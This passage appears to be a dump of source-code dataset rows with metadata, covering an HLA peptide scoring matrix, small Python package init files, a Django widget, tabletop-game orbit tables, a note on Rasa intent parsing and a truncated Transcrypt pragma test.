| 32.195402 | 68 | 0.631917 | 324 | 2,801 | 5.25 | 0.12963 | 0.141093 | 0.134039 | 0.094062 | 0.850088 | 0.833627 | 0.803645 | 0.776014 | 0.737213 | 0.737213 | 0 | 0.014369 | 0.204927 | 2,801 | 86 | 69 | 32.569767 | 0.749439 | 0 | 0 | 0.693333 | 0 | 0 | 0.20457 | 0.017137 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0 | false | 0 | 0.053333 | 0 | 0.053333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
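These tests exercise Rasa's `/intent_name@confidence{json entities}` shorthand: the prefix marks the message as a literal intent, the optional `@0.5` sets the confidence (defaulting to 1.0), and the optional JSON block carries entities. As a rough illustration of the grammar the tests cover (this is a sketch, not Rasa's actual `RegexInterpreter` implementation):

```python
import json
import re

INTENT_MESSAGE_PREFIX = "/"

def parse_intent_message(text):
    """Parse '/intent@confidence{"entity": "value"}' shorthand messages.

    Confidence and the JSON entity block are both optional, matching the
    four cases the tests above check.
    """
    body = text[len(INTENT_MESSAGE_PREFIX):]
    m = re.match(r'^([^@{]+)(?:@([\d.]+))?(\{.*\})?$', body)
    if m is None:
        raise ValueError(f"not an intent message: {text!r}")
    name, confidence, entities = m.groups()
    return {
        "intent": {"name": name, "confidence": float(confidence) if confidence else 1.0},
        "entities": json.loads(entities) if entities else {},
    }

print(parse_intent_message('/my_intent@0.5{"foo": "bar"}'))
# -> {'intent': {'name': 'my_intent', 'confidence': 0.5}, 'entities': {'foo': 'bar'}}
```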
dc826a76a6c0b483e26d8cdb24f8e6d3d7bfb617 | 2,816 | py | Python | epytope/Data/pssms/smmpmbec/mat/A_11_01_11.py | christopher-mohr/epytope | 8ac9fe52c0b263bdb03235a5a6dffcb72012a4fd | [
"BSD-3-Clause"
] | 7 | 2021-02-01T18:11:28.000Z | 2022-01-31T19:14:07.000Z | epytope/Data/pssms/smmpmbec/mat/A_11_01_11.py | christopher-mohr/epytope | 8ac9fe52c0b263bdb03235a5a6dffcb72012a4fd | [
"BSD-3-Clause"
] | 22 | 2021-01-02T15:25:23.000Z | 2022-03-14T11:32:53.000Z | epytope/Data/pssms/smmpmbec/mat/A_11_01_11.py | christopher-mohr/epytope | 8ac9fe52c0b263bdb03235a5a6dffcb72012a4fd | [
"BSD-3-Clause"
] | 4 | 2021-05-28T08:50:38.000Z | 2022-03-14T11:45:32.000Z | A_11_01_11 = {0: {'A': -0.386, 'C': 0.102, 'E': 0.077, 'D': 0.168, 'G': -0.151, 'F': 0.722, 'I': 0.425, 'H': -0.387, 'K': -0.334, 'M': 0.123, 'L': 0.271, 'N': -0.063, 'Q': 0.001, 'P': 0.279, 'S': -0.752, 'R': -0.316, 'T': -0.507, 'W': 0.364, 'V': -0.16, 'Y': 0.523}, 1: {'A': -0.56, 'C': 0.583, 'E': 0.367, 'D': 0.06, 'G': -0.107, 'F': 0.074, 'I': -0.435, 'H': 0.423, 'K': 0.346, 'M': -0.272, 'L': -0.122, 'N': 0.073, 'Q': -0.026, 'P': -0.056, 'S': -0.561, 'R': 0.777, 'T': -0.628, 'W': 0.304, 'V': -0.634, 'Y': 0.394}, 2: {'A': -0.08, 'C': -0.065, 'E': 0.073, 'D': 0.026, 'G': -0.007, 'F': -0.347, 'I': -0.067, 'H': 0.012, 'K': -0.133, 'M': 0.068, 'L': 0.057, 'N': 0.13, 'Q': 0.376, 'P': 0.265, 'S': 0.11, 'R': -0.04, 'T': 0.054, 'W': -0.076, 'V': -0.097, 'Y': -0.258}, 3: {'A': 0.027, 'C': -0.033, 'E': 0.003, 'D': 0.065, 'G': 0.122, 'F': -0.246, 'I': -0.014, 'H': -0.056, 'K': 0.306, 'M': 0.006, 'L': -0.035, 'N': -0.071, 'Q': -0.004, 'P': -0.181, 'S': 0.087, 'R': 0.268, 'T': -0.012, 'W': -0.064, 'V': -0.02, 'Y': -0.147}, 4: {'A': 0.01, 'C': -0.023, 'E': -0.031, 'D': -0.034, 'G': -0.015, 'F': -0.028, 'I': 0.043, 'H': -0.011, 'K': 0.037, 'M': 0.027, 'L': 0.046, 'N': -0.006, 'Q': 0.008, 'P': -0.044, 'S': 0.002, 'R': -0.001, 'T': 0.016, 'W': -0.019, 'V': 0.059, 'Y': -0.035}, 5: {'A': -0.126, 'C': -0.023, 'E': 0.031, 'D': 0.048, 'G': -0.017, 'F': 0.044, 'I': 0.022, 'H': 0.038, 'K': 0.089, 'M': 0.055, 'L': 0.039, 'N': 0.037, 'Q': -0.053, 'P': -0.047, 'S': -0.111, 'R': 0.128, 'T': -0.183, 'W': 0.062, 'V': -0.107, 'Y': 0.074}, 6: {'A': 0.021, 'C': 0.001, 'E': 0.002, 'D': 0.001, 'G': 0.024, 'F': 0.011, 'I': -0.032, 'H': 0.007, 'K': -0.015, 'M': 0.009, 'L': 0.012, 'N': 0.009, 'Q': 0.01, 'P': -0.016, 'S': 0.011, 'R': -0.002, 'T': -0.014, 'W': -0.012, 'V': -0.021, 'Y': -0.005}, 7: {'A': 0.112, 'C': -0.005, 'E': -0.007, 'D': 0.015, 'G': 0.059, 'F': -0.1, 'I': -0.132, 'H': 0.0, 'K': -0.016, 'M': -0.052, 'L': -0.066, 'N': 
-0.024, 'Q': 0.071, 'P': 0.171, 'S': 0.1, 'R': 0.028, 'T': 0.069, 'W': -0.073, 'V': -0.068, 'Y': -0.081}, 8: {'A': 0.898, 'C': 0.079, 'E': 0.199, 'D': -0.028, 'G': 0.12, 'F': -0.556, 'I': -0.034, 'H': -0.339, 'K': -0.177, 'M': -0.247, 'L': 0.098, 'N': 0.065, 'Q': 0.075, 'P': 0.476, 'S': 0.08, 'R': -0.059, 'T': -0.182, 'W': -0.397, 'V': 0.452, 'Y': -0.523}, 9: {'A': 0.562, 'C': -0.094, 'E': -0.02, 'D': -0.031, 'G': 0.183, 'F': -0.536, 'I': -0.058, 'H': 0.304, 'K': -0.218, 'M': -0.017, 'L': 0.047, 'N': 0.269, 'Q': 0.295, 'P': 0.13, 'S': 0.419, 'R': -0.691, 'T': 0.553, 'W': -0.71, 'V': 0.255, 'Y': -0.643}, 10: {'A': -0.036, 'C': 0.142, 'E': 0.117, 'D': 0.099, 'G': -0.118, 'F': 0.291, 'I': 0.347, 'H': -0.309, 'K': -1.188, 'M': 0.343, 'L': 0.301, 'N': 0.034, 'Q': -0.219, 'P': -0.137, 'S': -0.053, 'R': -0.721, 'T': 0.141, 'W': 0.448, 'V': 0.463, 'Y': 0.055}, -1: {'con': 4.0985}} | 2,816 | 2,816 | 0.394176 | 679 | 2,816 | 1.630339 | 0.282769 | 0.019874 | 0.009033 | 0.01084 | 0.02168 | 0.02168 | 0.02168 | 0.02168 | 0 | 0 | 0 | 0.373994 | 0.161577 | 2,816 | 1 | 2,816 | 2,816 | 0.094875 | 0 | 0 | 0 | 0 | 0 | 0.079162 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
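A matrix like `A_11_01_11` maps peptide position → amino-acid residue → score contribution, with the `-1: {'con': ...}` entry acting as a constant offset. SMM-family predictors such as SMMPMBEC typically sum the per-position contributions and add that constant to get a log10(IC50)-style prediction; that interpretation is an assumption here, since the file itself stores only the numbers. A scoring sketch, shown with a tiny hypothetical two-position matrix in the same shape:

```python
def score_peptide(matrix, peptide):
    # Sum the per-position residue contributions, then add the constant
    # stored under the -1 key. For SMM-style matrices the result is usually
    # read as a log10(IC50) estimate (an assumption, not stated in the file).
    total = sum(matrix[i][aa] for i, aa in enumerate(peptide))
    return total + matrix[-1]['con']

# Tiny hypothetical 2-position matrix mirroring the layout of A_11_01_11:
toy = {0: {'A': -0.5, 'K': 0.25}, 1: {'A': 0.125, 'K': -0.25}, -1: {'con': 4.0}}
print(score_peptide(toy, "AK"))  # -> 3.25  (-0.5 + -0.25 + 4.0)
```

Used on the real matrix, `peptide` would be an 11-mer and `matrix` would be `A_11_01_11` itself.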
dca235729293cce7c882ec9f72c00b0b537ec201 | 37 | py | Python | work/simple_des_y3_sims/simple_des_y3_sims_mcal/__init__.py | beckermr/misc | da8fed310a0c99d7a5a10a1bfa74aac4db676475 | [
"BSD-3-Clause"
] | 2 | 2020-06-30T21:08:08.000Z | 2020-07-01T02:46:34.000Z | work/simple_des_y3_sims/simple_des_y3_sims_mcal/__init__.py | beckermr/misc | da8fed310a0c99d7a5a10a1bfa74aac4db676475 | [
"BSD-3-Clause"
] | null | null | null | work/simple_des_y3_sims/simple_des_y3_sims_mcal/__init__.py | beckermr/misc | da8fed310a0c99d7a5a10a1bfa74aac4db676475 | [
"BSD-3-Clause"
] | 1 | 2020-04-18T04:10:47.000Z | 2020-04-18T04:10:47.000Z | from .run_it import run_mcal # noqa
| 18.5 | 36 | 0.756757 | 7 | 37 | 3.714286 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.189189 | 37 | 1 | 37 | 37 | 0.866667 | 0.108108 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f4930b27edda74cf81bc2aad9bd4b8e6217b16d7 | 73 | py | Python | example/simpleapp/widgets.py | callowayproject/django-stories | ea0398d69ea597819d0a6c75d4a3f65820321e13 | [
"Apache-2.0"
] | 10 | 2015-06-25T23:35:29.000Z | 2021-08-20T04:22:00.000Z | example/simpleapp/widgets.py | callowayproject/django-stories | ea0398d69ea597819d0a6c75d4a3f65820321e13 | [
"Apache-2.0"
] | null | null | null | example/simpleapp/widgets.py | callowayproject/django-stories | ea0398d69ea597819d0a6c75d4a3f65820321e13 | [
"Apache-2.0"
] | 2 | 2017-03-21T04:10:29.000Z | 2020-04-06T12:38:12.000Z | from django import forms
class CustomTextarea(forms.Textarea):
pass
| 14.6 | 37 | 0.780822 | 9 | 73 | 6.333333 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.164384 | 73 | 4 | 38 | 18.25 | 0.934426 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
f4db607f475ed651b7a41686c16f1c205800da07 | 192 | py | Python | src/MCQ/models/__init__.py | dreinq/DeepQ | abb6d8b492f802fefbc0095e8719377dc708069c | [
"Apache-2.0"
] | null | null | null | src/MCQ/models/__init__.py | dreinq/DeepQ | abb6d8b492f802fefbc0095e8719377dc708069c | [
"Apache-2.0"
] | null | null | null | src/MCQ/models/__init__.py | dreinq/DeepQ | abb6d8b492f802fefbc0095e8719377dc708069c | [
"Apache-2.0"
] | 1 | 2020-11-23T09:13:58.000Z | 2020-11-23T09:13:58.000Z | from .InceptAC import ActorCritic as InceptAC
from .Transformer import PolicyTransformer, ValueTransformer
from .ActorCritic import ActorCritic
from .GumbelActorCritic import GumbelActorCritic | 48 | 60 | 0.880208 | 19 | 192 | 8.894737 | 0.473684 | 0.201183 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.09375 | 192 | 4 | 61 | 48 | 0.971264 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f4ede4e144135850df4c651eab844f7634f7bec2 | 33 | py | Python | plugins/permalinks/__init__.py | mohnjahoney/website_source | edc86a869b90ae604f32e736d9d5ecd918088e6a | [
"MIT"
] | 13 | 2020-01-27T09:02:25.000Z | 2022-01-20T07:45:26.000Z | plugins/permalinks/__init__.py | mohnjahoney/website_source | edc86a869b90ae604f32e736d9d5ecd918088e6a | [
"MIT"
] | 29 | 2020-03-22T06:57:57.000Z | 2022-01-24T22:46:42.000Z | plugins/permalinks/__init__.py | mohnjahoney/website_source | edc86a869b90ae604f32e736d9d5ecd918088e6a | [
"MIT"
] | 6 | 2020-07-10T00:13:30.000Z | 2022-01-26T08:22:33.000Z | from .permalinks import register
| 16.5 | 32 | 0.848485 | 4 | 33 | 7 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121212 | 33 | 1 | 33 | 33 | 0.965517 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
762135fbaaba11c66c626818a3cc2487a89936d3 | 11,207 | py | Python | code/Orbits.py | Penultimate-Panacea/MegaTraveller-Referee-Companion | b3f54288e5e105579fa763b1c96372b2fe6416a4 | [
"Unlicense"
] | null | null | null | code/Orbits.py | Penultimate-Panacea/MegaTraveller-Referee-Companion | b3f54288e5e105579fa763b1c96372b2fe6416a4 | [
"Unlicense"
] | null | null | null | code/Orbits.py | Penultimate-Panacea/MegaTraveller-Referee-Companion | b3f54288e5e105579fa763b1c96372b2fe6416a4 | [
"Unlicense"
] | null | null | null | class OrbitTable:
# - is inside star, I is inner, H is habitable, O is outer, _ is incinerated, S is the star itself
table_00 = ["S", "_", "_", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O"]
table_01 = ["S", "_", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_02 = ["S", "-", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_03 = ["S", "-", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_04 = ["S", "-", "-", "_", "_", "_", "I", "I", "I", "I", "I", "I", "H", "O", "O"]
table_05 = ["S", "-", "-", "_", "_", "_", "_", "I", "I", "I", "I", "H", "O", "O", "O"]
table_06 = ["S", "-", "-", "-", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_07 = ["S", "-", "-", "-", "-", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_08 = ["S", "-", "-", "-", "-", "-", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_09 = ["S", "-", "-", "-", "-", "-", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_0A = ["S", "-", "-", "-", "-", "-", "-", "I", "I", "I", "I", "I", "H", "O", "O"]
table_0B = ["S", "-", "-", "-", "-", "-", "-", "-", "I", "I", "I", "I", "H", "O", "O"]
table_0C = ["S", "-", "-", "-", "-", "-", "-", "-", "I", "I", "I", "I", "H", "O", "O"]
table_0 = [table_00, table_01, table_02, table_03, table_04, table_05, table_06, table_07, table_08, table_09,
table_0A, table_0B, table_0C]
table_10 = ["S", "_", "_", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O"]
table_11 = ["S", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O", "O"]
table_12 = ["S", "_", "_", "_", "_", "I", "I", "I", "I", "I", "I", "H", "O", "O", "O"]
table_13 = ["S", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O", "O", "O"]
table_14 = ["S", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O", "O", "O"]
table_15 = ["S", "_", "_", "_", "I", "I", "I", "I", "I", "I", "H", "O", "O", "O", "O"]
table_16 = ["S", "_", "_", "_", "I", "I", "I", "I", "I", "I", "H", "O", "O", "O", "O"]
table_17 = ["S", "-", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O", "O", "O"]
table_18 = ["S", "-", "-", "-", "_", "I", "I", "I", "I", "I", "H", "O", "O", "O", "O"]
table_19 = ["S", "-", "-", "-", "-", "_", "I", "I", "I", "I", "H", "H", "O", "O", "O"]
table_1A = ["S", "-", "-", "-", "-", "-", "I", "I", "I", "I", "I", "H", "O", "O", "O"]
table_1B = ["S", "-", "-", "-", "-", "-", "-", "I", "I", "I", "I", "H", "H", "O", "O"]
table_1C = ["S", "-", "-", "-", "-", "-", "-", "-", "I", "I", "I", "H", "H", "O", "O"]
table_1 = [table_10, table_11, table_12, table_13, table_14, table_15, table_16, table_17, table_18, table_19,
table_1A, table_1B, table_1C]
# ABOVE COMPLETE TODO BELOW:
table_20 = ["S", "_", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "O", "H", "O"]
table_21 = ["S", "_", "_", "_", "_", "I", "I", "I", "I", "I", "I", "I", "O", "O", "O"]
table_22 = ["S", "_", "_", "I", "I", "I", "I", "I", "I", "H", "O", "O", "O", "O", "O"]
table_23 = ["S", "_", "I", "I", "I", "I", "I", "I", "H", "O", "O", "O", "O", "O", "O"]
table_24 = ["S", "_", "I", "I", "I", "I", "I", "I", "H", "O", "O", "O", "O", "O", "O"]
table_25 = ["S", "_", "I", "I", "I", "I", "I", "I", "H", "O", "O", "O", "O", "O", "O"]
table_26 = ["S", "_", "I", "I", "I", "I", "I", "I", "H", "O", "O", "O", "O", "O", "O"]
table_27 = ["S", "_", "I", "I", "I", "I", "I", "I", "H", "O", "O", "O", "O", "O", "O"]
table_28 = ["S", "_", "I", "I", "I", "I", "I", "I", "I", "H", "O", "O", "O", "O", "O"]
table_29 = ["S", "-", "_", "I", "I", "I", "I", "I", "I", "H", "O", "O", "O", "O", "O"]
table_2A = ["S", "-", "-", "-", "I", "I", "I", "I", "I", "I", "H", "O", "O", "O", "O"]
table_2B = ["S", "-", "-", "-", "-", "-", "I", "I", "I", "I", "I", "H", "H", "O", "O"]
table_2C = ["S", "-", "-", "-", "-", "-", "I", "I", "I", "I", "I", "H", "H", "O", "O"]
table_2 = [table_20, table_21, table_22, table_23, table_24, table_25, table_26, table_27, table_28, table_29,
table_2A, table_2B, table_2C]
table_30 = ["S", "_", "_", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O"]
table_31 = ["S", "_", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_32 = ["S", "-", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_33 = ["S", "-", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_34 = ["S", "-", "-", "_", "_", "_", "I", "I", "I", "I", "I", "I", "H", "O", "O"]
table_35 = ["S", "-", "-", "_", "_", "_", "_", "I", "I", "I", "I", "H", "-", "O", "O"]
table_36 = ["S", "-", "-", "-", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_37 = ["S", "-", "-", "-", "-", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_38 = ["S", "-", "-", "-", "-", "-", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_39 = ["S", "-", "-", "-", "-", "-", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_3A = ["S", "-", "-", "-", "-", "-", "-", "I", "I", "I", "I", "I", "H", "O", "O"]
table_3B = ["S", "-", "-", "-", "-", "-", "-", "-", "I", "I", "I", "I", "H", "O", "O"]
table_3C = ["S", "-", "-", "-", "-", "-", "-", "-", "I", "I", "I", "I", "H", "O", "O"]
table_3 = [table_30, table_31, table_32, table_33, table_34, table_35, table_36, table_37, table_38, table_39,
table_3A, table_3B, table_3C]
table_40 = ["S", "_", "_", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O"]
table_41 = ["S", "_", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_42 = ["S", "-", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_43 = ["S", "-", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_44 = ["S", "-", "-", "_", "_", "_", "I", "I", "I", "I", "I", "I", "H", "O", "O"]
table_45 = ["S", "-", "-", "_", "_", "_", "_", "I", "I", "I", "I", "H", "-", "O", "O"]
table_46 = ["S", "-", "-", "-", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_47 = ["S", "-", "-", "-", "-", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_48 = ["S", "-", "-", "-", "-", "-", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_49 = ["S", "-", "-", "-", "-", "-", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_4A = ["S", "-", "-", "-", "-", "-", "-", "I", "I", "I", "I", "I", "H", "O", "O"]
table_4B = ["S", "-", "-", "-", "-", "-", "-", "-", "I", "I", "I", "I", "H", "O", "O"]
table_4C = ["S", "-", "-", "-", "-", "-", "-", "-", "I", "I", "I", "I", "H", "O", "O"]
table_4 = [table_40, table_41, table_42, table_43, table_44, table_45, table_46, table_47, table_48, table_49,
table_4A, table_4B, table_4C]
table_50 = ["S", "_", "_", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O"]
table_51 = ["S", "_", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_52 = ["S", "-", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_53 = ["S", "-", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_54 = ["S", "-", "-", "_", "_", "_", "I", "I", "I", "I", "I", "I", "H", "O", "O"]
table_55 = ["S", "-", "-", "_", "_", "_", "_", "I", "I", "I", "I", "H", "-", "O", "O"]
table_56 = ["S", "-", "-", "-", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_57 = ["S", "-", "-", "-", "-", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_58 = ["S", "-", "-", "-", "-", "-", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_59 = ["S", "-", "-", "-", "-", "-", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_5A = ["S", "-", "-", "-", "-", "-", "-", "I", "I", "I", "I", "I", "H", "O", "O"]
table_5B = ["S", "-", "-", "-", "-", "-", "-", "-", "I", "I", "I", "I", "H", "O", "O"]
table_5C = ["S", "-", "-", "-", "-", "-", "-", "-", "I", "I", "I", "I", "H", "O", "O"]
table_5 = [table_50, table_51, table_52, table_53, table_54, table_55, table_56, table_57, table_58, table_59,
table_5A, table_5B, table_5C]
table_60 = ["S", "_", "_", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O"]
table_61 = ["S", "_", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_62 = ["S", "-", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_63 = ["S", "-", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_64 = ["S", "-", "-", "_", "_", "_", "I", "I", "I", "I", "I", "I", "H", "O", "O"]
table_65 = ["S", "-", "-", "_", "_", "_", "_", "I", "I", "I", "I", "H", "-", "O", "O"]
table_66 = ["S", "-", "-", "-", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_67 = ["S", "-", "-", "-", "-", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_68 = ["S", "-", "-", "-", "-", "-", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_69 = ["S", "-", "-", "-", "-", "-", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_6A = ["S", "-", "-", "-", "-", "-", "-", "I", "I", "I", "I", "I", "H", "O", "O"]
table_6B = ["S", "-", "-", "-", "-", "-", "-", "-", "I", "I", "I", "I", "H", "O", "O"]
table_6C = ["S", "-", "-", "-", "-", "-", "-", "-", "I", "I", "I", "I", "H", "O", "O"]
table_6 = [table_60, table_61, table_62, table_63, table_64, table_65, table_66, table_67, table_68, table_69,
table_6A, table_6B, table_6C]
table_70 = ["S", "_", "_", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O"]
table_71 = ["S", "_", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_72 = ["S", "-", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_73 = ["S", "-", "_", "_", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_74 = ["S", "-", "-", "_", "_", "_", "I", "I", "I", "I", "I", "I", "H", "O", "O"]
table_75 = ["S", "-", "-", "_", "_", "_", "_", "I", "I", "I", "I", "H", "-", "O", "O"]
table_76 = ["S", "-", "-", "-", "_", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_77 = ["S", "-", "-", "-", "-", "_", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_78 = ["S", "-", "-", "-", "-", "-", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_79 = ["S", "-", "-", "-", "-", "-", "_", "I", "I", "I", "I", "I", "H", "O", "O"]
table_7A = ["S", "-", "-", "-", "-", "-", "-", "I", "I", "I", "I", "I", "H", "O", "O"]
table_7B = ["S", "-", "-", "-", "-", "-", "-", "-", "I", "I", "I", "I", "H", "O", "O"]
table_7C = ["S", "-", "-", "-", "-", "-", "-", "-", "I", "I", "I", "I", "H", "O", "O"]
table_7 = [table_70, table_71, table_72, table_73, table_74, table_75, table_76, table_77, table_78, table_79,
table_7A, table_7B, table_7C]
master_table = [table_0, table_1, table_2, table_3, table_4, table_5, table_6, table_7]
class Orbit:
def __init__(self):
self.number = None
self.is_inner = False
self.is_hab = False
self.is_outer = False
self.is_incinerated = False
self.body = None
| 83.014815 | 114 | 0.292228 | 1,483 | 11,207 | 1.864464 | 0.095752 | 0.300181 | 0.337432 | 0.299458 | 0.537432 | 0.535262 | 0.532369 | 0.532369 | 0.524051 | 0.398192 | 0 | 0.044537 | 0.230659 | 11,207 | 134 | 115 | 83.634328 | 0.276154 | 0.011065 | 0 | 0 | 0 | 0 | 0.140807 | 0 | 0 | 0 | 0 | 0.007463 | 0 | 1 | 0.007692 | false | 0 | 0 | 0 | 0.892308 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
520f207cad089b78c508143b5f906d85f8c2f637 | 1,642 | py | Python | transcrypt/development/automated_tests/transcrypt/executable_comments/__init__.py | JMCanning78/Transcrypt | 8a8dabe831240414fdf1d5027fa2b0d71ab45d05 | [
"Apache-2.0"
] | 1 | 2019-10-14T00:57:04.000Z | 2019-10-14T00:57:04.000Z | transcrypt/development/automated_tests/transcrypt/executable_comments/__init__.py | JMCanning78/Transcrypt | 8a8dabe831240414fdf1d5027fa2b0d71ab45d05 | [
"Apache-2.0"
] | 2 | 2021-03-11T07:09:19.000Z | 2021-05-12T11:26:23.000Z | transcrypt/development/automated_tests/transcrypt/executable_comments/__init__.py | JMCanning78/Transcrypt | 8a8dabe831240414fdf1d5027fa2b0d71ab45d05 | [
"Apache-2.0"
] | 1 | 2021-02-07T00:22:12.000Z | 2021-02-07T00:22:12.000Z | from org.transcrypt.stubs.browser import __pragma__
def run (autoTester):
# __pragma__ ('ecom') # ===================================================================
# --- Executed only by Transcrypt ---
'''?
for i in range (10):
autoTester.check (i)
?'''
# --- Executed only by CPython ---
# __pragma__ ('skip')
for i in range (10):
autoTester.check (i)
# __pragma__ ('noskip')
# --- Executed only by Transcrypt ---
#?autoTester.check (100)
# --- Executed only by CPython ---
autoTester.check (100) #__: skip
#__pragma__ ('noecom') # ===================================================================
# --- Executed by none ---
'''?
for i in range (10, 20):
autoTester.check (i)
?'''
# --- Executed by none ---
#?autoTester.check (200)
__pragma__ ('ecom') # ===================================================================
# --- Executed only by Transcrypt ---
'''?
for i in range (20, 30):
autoTester.check (i)
?'''
# --- Executed only by CPython ---
# __pragma__ ('skip')
for i in range (20, 30):
autoTester.check (i)
# __pragma__ ('noskip')
# --- Executed only by Transcrypt ---
